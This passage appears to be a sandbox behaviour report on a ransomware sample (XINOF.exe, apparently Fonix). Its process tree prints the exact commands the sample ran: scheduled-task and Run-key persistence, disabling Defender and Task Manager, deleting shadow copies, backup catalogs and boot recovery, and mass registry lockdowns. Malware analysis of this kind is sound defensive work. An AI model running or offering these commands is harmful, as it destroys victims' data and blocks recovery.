wrote to memory of 1768 1492 XINOF.exe cmd.exe PID 1768 wrote to memory of 1764 1768 cmd.exe reg.exe PID 1768 wrote to memory of 1764 1768 cmd.exe reg.exe PID 1768 wrote to memory of 1764 1768 cmd.exe reg.exe PID 1492 wrote to memory of 1844 1492 XINOF.exe cmd.exe PID 1492 wrote to memory of 1844 1492 XINOF.exe cmd.exe PID 1492 wrote to memory of 1844 1492 XINOF.exe cmd.exe PID 1844 wrote to memory of 1848 1844 cmd.exe reg.exe PID 1844 wrote to memory of 1848 1844 cmd.exe reg.exe PID 1844 wrote to memory of 1848 1844 cmd.exe reg.exe PID 1492 wrote to memory of 1884 1492 XINOF.exe cmd.exe PID 1492 wrote to memory of 1884 1492 XINOF.exe cmd.exe PID 1492 wrote to memory of 1884 1492 XINOF.exe cmd.exe PID 1884 wrote to memory of 1376 1884 cmd.exe reg.exe PID 1884 wrote to memory of 1376 1884 cmd.exe reg.exe PID 1884 wrote to memory of 1376 1884 cmd.exe reg.exe PID 1492 wrote to memory of 1692 1492 XINOF.exe cmd.exe PID 1492 wrote to memory of 1692 1492 XINOF.exe cmd.exe PID 1492 wrote to memory of 1692 1492 XINOF.exe cmd.exe PID 1692 wrote to memory of 1508 1692 cmd.exe cmd.exe PID 1692 wrote to memory of 1508 1692 cmd.exe cmd.exe PID 1692 wrote to memory of 1508 1692 cmd.exe cmd.exe PID 1508 wrote to memory of 1384 1508 cmd.exe icacls.exe PID 1508 wrote to memory of 1384 1508 cmd.exe icacls.exe PID 1508 wrote to memory of 1384 1508 cmd.exe icacls.exe PID 1492 wrote to memory of 1768 1492 XINOF.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\XINOF.exe"C:\Users\Admin\AppData\Local\Temp\XINOF.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix /TR %temp%/Fonix.exe /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN fonix /TR C:\Users\Admin\AppData\Local\Temp/Fonix.exe /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d %temp%Fonix.exe /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonix.exe /f3⤵
- Adds Run key to start application
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d %temp%Fonix.exe /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonix.exe /f3⤵
- Adds Run key to start application
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d %temp%Fonix.exe /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonix.exe /f3⤵
- Adds Run key to start application
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d %temp%Fonix.exe /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonix.exe /f3⤵
- Adds Run key to start application
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls * /grant Everyone:(OI)(CI)F /T /C /Q4⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy Cpriv.key %appdata%\Cpriv.key2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy Cpub.key %appdata%\Cpub.key2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy SystemID C:\ProgramData\SystemID2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet & wmic shadowcopy delete & bcdedit /set {default} boostatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet/2⤵
-
C:\Windows\system32\cmd.execmd.exe /c vssadmin Delete Shadows /All /Quiet3⤵
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet4⤵
- Interacts with shadow copies
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} boostatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet/3⤵
- Deletes backup catalog
- Drops file in Windows directory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Label D: XINOF2⤵
-
C:\Windows\system32\label.exeLabel D: XINOF3⤵
- Enumerates connected drives
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Label E: XINOF2⤵
-
C:\Windows\system32\label.exeLabel E: XINOF3⤵
- Enumerates connected drives
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Label F: XINOF2⤵
-
C:\Windows\system32\label.exeLabel F: XINOF3⤵
- Enumerates connected drives
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Label G: XINOF2⤵
-
C:\Windows\system32\label.exeLabel G: XINOF3⤵
- Enumerates connected drives
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Label H: XINOF2⤵
-
C:\Windows\system32\label.exeLabel H: XINOF3⤵
- Enumerates connected drives
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Label I: XINOF2⤵
-
C:\Windows\system32\label.exeLabel I: XINOF3⤵
- Enumerates connected drives
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Label J: XINOF2⤵
-
C:\Windows\system32\label.exeLabel J: XINOF3⤵
- Enumerates connected drives
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Label K: XINOF2⤵
-
C:\Windows\system32\label.exeLabel K: XINOF3⤵
- Enumerates connected drives
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Label L: XINOF2⤵
-
C:\Windows\system32\label.exeLabel L: XINOF3⤵
- Enumerates connected drives
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Label M: XINOF2⤵
-
C:\Windows\system32\label.exeLabel M: XINOF3⤵
- Enumerates connected drives
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Label N: XINOF2⤵
-
C:\Windows\system32\label.exeLabel N: XINOF3⤵
- Enumerates connected drives
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Label A: XINOF2⤵
-
C:\Windows\system32\label.exeLabel A: XINOF3⤵
- Enumerates connected drives
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Label B: XINOF2⤵
-
C:\Windows\system32\label.exeLabel B: XINOF3⤵
- Enumerates connected drives
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Label O: XINOF2⤵
-
C:\Windows\system32\label.exeLabel O: XINOF3⤵
- Enumerates connected drives
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Label P: XINOF2⤵
-
C:\Windows\system32\label.exeLabel P: XINOF3⤵
- Enumerates connected drives
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Label Q: XINOF2⤵
-
C:\Windows\system32\label.exeLabel Q: XINOF3⤵
- Enumerates connected drives
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Label R: XINOF2⤵
-
C:\Windows\system32\label.exeLabel R: XINOF3⤵
- Enumerates connected drives
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Label S: XINOF2⤵
-
C:\Windows\system32\label.exeLabel S: XINOF3⤵
- Enumerates connected drives
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Label T: XINOF2⤵
-
C:\Windows\system32\label.exeLabel T: XINOF3⤵
- Enumerates connected drives
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Label U: XINOF2⤵
-
C:\Windows\system32\label.exeLabel U: XINOF3⤵
- Enumerates connected drives
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Label V: XINOF2⤵
-
C:\Windows\system32\label.exeLabel V: XINOF3⤵
- Enumerates connected drives
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Label W: XINOF2⤵
-
C:\Windows\system32\label.exeLabel W: XINOF3⤵
- Enumerates connected drives
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Label X: XINOF2⤵
-
C:\Windows\system32\label.exeLabel X: XINOF3⤵
- Enumerates connected drives
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Label Y: XINOF2⤵
-
C:\Windows\system32\label.exeLabel Y: XINOF3⤵
- Enumerates connected drives
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Label Z: XINOF2⤵
-
C:\Windows\system32\label.exeLabel Z: XINOF3⤵
- Enumerates connected drives
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Label C: XINOF2⤵
-
C:\Windows\system32\label.exeLabel C: XINOF3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoTrayContextMenu /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoTrayContextMenu /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisableContextMenusInStart /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisableContextMenusInStart /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMMyDocs /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMMyDocs /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMMyPictures /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMMyPictures /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\RemovableStorageDevices /v Deny_All /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\RemovableStorageDevices /v Deny_All /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore /v DisableConfig /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore /v DisableConfig /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore /v DisableSR /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore /v DisableSR /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer /v DisableMSI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer /v DisableMSI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f2⤵
-
